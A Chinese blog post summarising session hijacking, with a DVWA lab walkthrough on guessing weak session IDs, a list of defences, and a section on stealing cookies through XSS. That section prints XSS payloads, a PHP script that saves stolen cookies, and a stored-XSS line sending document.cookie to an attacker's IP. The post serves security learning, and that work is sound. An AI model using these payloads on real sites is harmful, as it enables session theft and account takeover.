会话劫持总结

已于 2023-09-19 18:34:34 修改
阅读量329 收藏
点赞数 2
分类专栏: 会话劫持 文章标签: Session劫持 DVWA实验 防御措施 Cookie盗取 XSS攻击
于 2021-04-08 18:11:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51582652/article/details/115512793
版权

会话劫持

概述

Session对于Web应用无疑是最重要的,也是最复杂的。对于web应用程序来说,加强安全性的第一条原则就是 – 不要信任来自客户端的数据,一定要进行数据验证以及过滤,才能在程序中使用,进而保存到数据层。 然而,为了维持来自同一个用户的不同请求之间的状态, 客户端必须要给服务器端发送一个唯一的身份标识符(Session ID)。 很显然,这和前面提到的安全原则是矛盾的,但是没有办法,http协议是无状态的,为了维持状态,我们别无选择。 可以看出,web应用程序中最脆弱的环节就是session,因为服务器端是通过来自客户端的一个身份标识来认证用户的, 所以session是web应用程序中最需要加强安全性的环节。

基于session的攻击有很多种方式。大部分的手段都是首先通过捕获合法用户的session, 然后冒充该用户来访问系统。也就是说,攻击者至少必须要获取到一个有效的session标识符,用于接下来的身份验证。

DVWA实验

完全不知道这个怎么通关,这玩意儿大佬说是猜session值,所以这应该是的吧。
开始第一步,调级别。

LOW级别

首先将这个级别换到了LOW,题如其名。还是先利用burp进行抓包。
在这里插入图片描述
因为session是服务器给返回的值,所以我们应该查看他的响应包,所以我们将包发送到Repeat模块。
在这里插入图片描述
我们连续点击send发送包,查看他的session值。查看他的session值的规律,如果他有规律那么我们就可以构造session值。
在这里插入图片描述
通过几次的实验发现他没发送一次session值就增加一,所以我们可以利用这个session值来进行Cookie盗用。

使用Hackbar工具进行攻击。
按照上面的html构造Cookie的payload

dvwaSession=12; security=low; PHPSESSID=9uu34n47j66u3g420tv8j7chu0

在这里插入图片描述

Midium级别

这个也是一样,更换级别,使用burp进行抓包。
在这里插入图片描述
将抓住的包发送到Repeat模块。然后点击send发送。
在这里插入图片描述
多发送几次发现他毫无规律的在变化。

在这里插入图片描述
但是看这个有那么一点像时间戳,我们可以写一个脚本看是否是时间戳。
在这里插入图片描述
发现这个好像就是时间戳,所以我们可以利用脚步加Cookie盗用进行攻击注入。
这个级别就不能使用hackbar了,我们只能使用脚本进行攻击,在修改headers中的Cookie值进行攻击,将时间戳传递给session。

HiGH级别

还是原样子,我们先修改级别,进行抓包分析。
在这里插入图片描述
如上图所示,还没有像服务器发送请求包但是这个session值就出现在了请求包了。尝试多请求几次他还是那个session值,这个session值未发生改变。

在这里插入图片描述
就这就不会了,还是查看源码吧。

在这里插入图片描述
通过源码知道session值分为了两部分,第一部分将session值给用md5加密了,加密还好,关键是他加密之后还要使用时间戳,时间戳还好,他还加了3600。

防御措施

  1. 更改Session名称。PHP中Session的默认名称是PHPSESSID,此变量会保存在Cookie中,如果攻击者不分析站点,就不能猜到Session名称,阻挡部分攻击。
  2. 关闭透明化SessionID。透明化SessionID指当浏览器中的Http请求没有使用Cookie来存放Session ID时,Session ID则使用URL来传递。
  3. 设置HttpOnly。通过设置Cookie的HttpOnly为true,可以防止客户端脚本访问这个Cookie,从而有效的防止XSS攻击。
  4. 关闭所有phpinfo类dump request信息的页面。
  5. 添加Token校验,或者添加随机数。

Cookie盗取

详情去看XSS总结吧。

最直接的方法就是利用XSS漏洞进行获取。

反射型XSS注入


脚本内容:<script>alert(document.cookie)</script>
伪脚本内容:javascript:alert(document.cookie) 
事件内容:οnclick=alert(document.cookie) 
超链接内容:<a href="javascript:alert(document.cookie)">

存储型XSS注入。
首先先创建一个存放Cookie值的文件,例如创建一个cookie.txt的文件用于存放Cookie值。
然后在构建一个文件用于获取Cookie值。例如创建一个getcookie.php。
getcookie.php内容

<?php
$cookie = $_GET['cookie'];
file_put_contents('cookie.txt',$cookie);
?>

然后我们向他的存储性XSS漏洞点去添加执行语句,让他存储进数据库中。

<script>location.href="http://你的ip/getcookie.php?cookie="+document.cookie</script>

将这个语句放进数据库中,只要他点击了那个漏洞点就会执行这段话,他的Cookie值就会被放进cookie.txt中。
后面就可以利用cookie做一些别的事儿了。

基于TCP的会话劫持-基于JS蠕虫的会话劫持-基于令牌和会话 ID 重置方法防止会话劫持
Martin-share的博客
02-03 848
基于TCP的会话劫持-基于JS蠕虫的会话劫持-基于令牌和会话 ID 重置方法防止会话劫持
【XSS漏洞-06】XSS漏洞利用案例(浏览器劫持会话劫持、GetShell)—基于神器beEF
m0_64378913的博客
06-02 4590
(1)了解beEF工具的使用; (2)加深理解XSS漏洞的利用和危害; (3)掌握浏览器劫持的攻击方法; (4)掌握会话劫持的攻击方法; (5)掌握通过XSS漏洞GetShell的方法。
理解xss-劫持会话
高野02blog
11-24 2999
xss-劫持会话攻击实验 Step01: 搭建好攻击者的Web服务器(LAMP或LNMP平台,phpstudy) http://192.168.195.127/cookie.php 验证PHP环境 (1)看端口 Web:80 mysql:3306 php:9000 (2)验证PHP文件能不能正常解析 网站的根目录 c:\phpstudy_pro\www 创建一个test.php文件 <?php phpinfo() ?> Step02:在攻击者的Web服务器的网站根目录下创建cookie.php
XSS 绕过实例, 钓鱼网站,会话劫持
buffedon的博客
05-26 1321
XSS原理--防御--绕过实例原理危害防护绕过实例场景一:事件+单引号闭合场景二:大小写绕过场景三:双写绕过场景四:JavaScript伪协议+编码场景五:事件+%0a当做空格场景六:http头部参数插入payload场景七:文件解析 原理 危害 防护 绕过实例 场景一:事件+单引号闭合 ‘οnmοuseοver=alert(1)’ 查看源代码后发现,value是要用单引号进行闭合 场景二:大小写绕过 "><scRIp>alert(1)</script><" 发现
什么是会话劫持攻击
最新发布
m0_57836225的博客
08-19 677
例如,在用户登录了一个网站的情况下,攻击者通过诱使用户访问恶意网站或点击恶意链接,导致用户的浏览器在用户不知情的情况下向目标网站发送请求(如修改密码、转账等)。例如,当用户登录成功后,服务器创建一个 Session 并为其生成一个唯一的会话 ID,然后将这个会话 ID 以 Cookie 的形式发送给客户端,后续客户端的请求会自动携带这个 Cookie,服务器通过解析 Cookie 中的会话 ID 来识别用户的会话。2. Shiro:一个功能强大的 Java 安全框架,也能用于处理会话管理和防止会话劫持
XSS利用姿势-会话劫持-->不只是弹cookie
风雨来花满楼的博客
09-28 1070
描述(这里直接使用项目作者原话): SuperXSS项目地址: https://github.com/kagurazakasanae/SuperXSS 引言:当X别人站的时候,遇到Httponly flag时,被x到的站位于内网无法直接访问时,你要做的是:使用SuperXSSS SuperXSS是一个基于Websocket的客户端网页代理程序,客户端JS被注入之后会创建到指定服务端的Websocket连接并接收命令进行XHR请求,从而使得无法直接访问的后台等可以通过客户端浏览器本身作为代理访问。 程序
xss、csrf、界面操作劫持详解
qj6837的博客
01-24 422
1. xss (Cross Site Scripting) 跨站脚本攻击:发生在目标网站中目标用户的浏览器上,当用户浏览器渲染整个HTML文档的过程中执行了不在预期内的脚本时,就发生了xss。 跨站脚本的重点不在‘跨站’上,而在于‘脚本’上。大多数XSS攻击的主要方式是嵌入一段远程或者第三方域上的JS代码。实际上是在目标网站的作用域下执行了这段js代码。 类型 反射型xss(非持久型XSS):...
JavaScript蠕虫驱动的实时会话劫持攻击技术解析
本文档深入探讨了"基于Javascript蠕虫的实时会话劫持攻击技术研究"这一主题,重点关注在现代Web应用程序中,特别是在存在跨站脚本(XSS)漏洞的情况下,如何利用JavaScript蠕虫实现对用户实时会话劫持。这种攻击技术...
物联网工程专业TCP网络攻击实践:TCPRST、会话劫持与SYNFlood
课程设计由三位学生共同完成,分别负责不同类型的TCP攻击实验:宋涌负责TCP会话劫持,胡坤负责TCPRST攻击,周礼佟则专注于TCPSYNFlood攻击。 一、TCP协议与网络安全 TCP(传输控制协议)是互联网协议族中最核心的...
XSS基础入门/从0到1/非常基础/cookie/会话劫持
ChenD的学习笔记
10-10 1661
cookie介绍、XSS类型、XSS盗取cookie、利用Cookie劫持会话
Session攻击手段(会话劫持/固定)及其安全防御措施
热门推荐
马学朝的博客
01-19 3万+
一、       概述        对于Web应用程序来说,加强安全性的第一条原则就是——不要信任来自客户端的数据,一定要进行数据验证以及过滤才能在程序中使用,进而保存到数据层。然而,由于Http的无状态性,为了维持来自同一个用户的不同请求之间的状态,客户端必须发送一个唯一的身份标识符(Session ID)来表明自己的身份。很显然,这与前面提到的安全原则是相违背的,但是没有办法,为了维持
什么是会话劫持?如何预防?
学海无涯苦作舟的博客
03-24 3463
会话是Internet通讯的重要组成部分,大部分都是基于Web的。会话劫持是通过利用活动的Web会话进行的Web攻击。会话是两个计算机系统之间进行通信的时间段。Web服务器需要身份验证,因为通过网站进行的每个用户通信都使用多个TCP / IP通道。 身份验证的一种常见形式始终是使用用户名和密码,它们通常是预定义的。身份验证成功后,Web服务器将会话令牌发送给用户,然后将其存储在启用会话的用户计算机中。会话ID可以作为cookie存储在HTTP标头或URL中。 会话劫持如何工作? 当入侵者通过劫持或窃取用于在
什么是会话劫持以及如何阻止它
allway2的博客
08-02 1181
HTTPS请求将被加密,因此cookie将通过网络安全地发送到您的应用程序。通过使用此cookie,只有您的网络服务器能够识别用户是谁,并将相应地提供内容。所以简单来说,如果您不设置httpOnly标志,那么您的cookie可以从前端JavaScript代码中读取。因此,这是窃取客户会话ID的行为,通过该ID,他们可以访问您的Web应用程序,就好像他们是那个客户一样。因此,当您处理会话cookie或任何其他重要的cookie时,请确保添加这两个标志。...
Cookie , Session ,Session 劫持简单总结
dian07342的博客
06-23 184
cookie 机制: Cookies 是 服务器 在 本地机器 上存储的 小段文本,并伴随着 每一个请求,发送到 同一台 服务器。 网络服务器 用 HTTP头 向客户端发送 Cookies。在客户端,浏览器解析这些 cookies 并将它们保存成为一个本地文件,他会自动将同一台服务器的任何请求附上这些 cookies。 因为 HTTP 是一种无状态的协议,而cookie机制采用的是...
Asp.net安全架构之2:Session hijacking(会话劫持
weixin_34121304的博客
05-30 277
原理 会话劫持是指通过非常规手段,来得到合法用户在客户端和服务器段进行交互的特征值(一般为sessionid),然后伪造请求,去访问授权用户的数据。 获取特征值的非常规有段主要有如下几种: 首先是猜测的方式,如果我们的sessionid的生成是有规律的,那么使用猜测的方式就可以到达非法获取的目的,如图所示:   其次是session fixation攻击。session fixation...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值